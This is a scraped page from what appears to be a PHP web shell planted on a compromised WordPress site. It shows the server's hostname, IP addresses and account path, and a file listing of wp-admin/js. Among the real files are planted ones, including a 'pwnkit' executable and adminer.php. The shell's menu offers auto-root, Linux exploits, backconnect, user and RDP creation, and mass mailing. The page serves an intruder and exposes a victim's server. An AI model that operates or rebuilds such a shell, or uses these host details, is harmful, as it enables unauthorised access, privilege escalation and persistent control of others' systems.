Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.54
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
yvffpqmy /
dataharbor.africa /
wp-admin /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
widgets
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
accordion.min.js
758
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
color-picker.min.js
3.4
KB
-rw-r--r--
comment.js
2.85
KB
-rw-r--r--
common.min.js
23.12
KB
-rw-r--r--
custom-header.js
1.98
KB
-rw-r--r--
dashboard.min.js
8.65
KB
-rw-r--r--
edit-comments.js
37.12
KB
-rw-r--r--
editor-expand.js
41.61
KB
-rw-r--r--
editor.min.js
12.76
KB
-rw-r--r--
farbtastic.js
7.67
KB
-rw-r--r--
gallery.js
5.41
KB
-rw-r--r--
image-edit.js
39.98
KB
-rw-r--r--
inline-edit-post.js
20.17
KB
-rw-r--r--
language-chooser.js
890
B
-rw-r--r--
language-chooser.min.js
423
B
-rw-r--r--
link.js
3.89
KB
-rw-r--r--
media-gallery.js
1.27
KB
-rw-r--r--
media-upload.min.js
1.13
KB
-rw-r--r--
post.js
38.68
KB
-rw-r--r--
postbox.js
18.49
KB
-rw-r--r--
privacy-tools.js
10.67
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
revisions.min.js
17.97
KB
-rw-r--r--
site-icon.min.js
2.2
KB
-rw-r--r--
tags-suggest.min.js
2.22
KB
-rw-r--r--
tags.js
4.85
KB
-rw-r--r--
updates.js
109.33
KB
-rw-r--r--
user-profile.min.js
6.7
KB
-rw-r--r--
user-suggest.min.js
676
B
-rw-r--r--
widgets.js
22.56
KB
-rw-r--r--
word-count.js
7.52
KB
-rw-r--r--
xfn.min.js
458
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : media-gallery.js
/** * This file is used on media-upload.php which has been replaced by media-new.php and upload.php * * @deprecated 3.5.0 * @output wp-admin/js/media-gallery.js */ /* global ajaxurl */ jQuery(function($) { /** * Adds a click event handler to the element with a 'wp-gallery' class. */ $( 'body' ).on( 'click.wp-gallery', function(e) { var target = $( e.target ), id, img_size, nonceValue; if ( target.hasClass( 'wp-set-header' ) ) { // Opens the image to preview it full size. ( window.dialogArguments || opener || parent || top ).location.href = target.data( 'location' ); e.preventDefault(); } else if ( target.hasClass( 'wp-set-background' ) ) { // Sets the image as background of the theme. id = target.data( 'attachment-id' ); img_size = $( 'input[name="attachments[' + id + '][image-size]"]:checked').val(); nonceValue = $( '#_wpnonce' ).val() && ''; /** * This Ajax action has been deprecated since 3.5.0, see custom-background.php */ jQuery.post(ajaxurl, { action: 'set-background-image', attachment_id: id, _ajax_nonce: nonceValue, size: img_size }, function() { var win = window.dialogArguments || opener || parent || top; win.tb_remove(); win.location.reload(); }); e.preventDefault(); } }); });
Close